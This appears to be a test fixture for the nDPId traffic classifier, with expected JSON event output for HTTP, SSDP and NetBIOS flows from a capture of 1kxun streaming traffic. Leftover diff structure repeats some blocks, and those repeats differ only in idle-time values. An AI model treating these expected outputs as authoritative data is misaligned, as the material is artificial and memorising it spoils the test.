00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"}
00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"}
00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}}
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMMsAAAER0qXAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOp0AAAERyODAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379271,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="}
@@ -152,21 +152,21 @@
00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
00741{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1470104379579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAD5AABAAEARs2DAqAVDwKj\/\/wCKAIoA5V88EQouRMCoBUMAigDPAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAANQAAAAAAAAAAAAAAAAAAAAAAAAA1AFYAAwABAAEAAgBGAFxNQUlMU0xPVFxCUk9XU0UADFDgkwQAV09SS0dST1VQAAAAAAAAAAQJABAAgA8BVapTQU5KSS1MSUZFQk9PSy1MSDUzMQA="}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1470104379887,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104379887,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiDQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACATQ="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379916,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379916,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"}
00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"}
00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"}
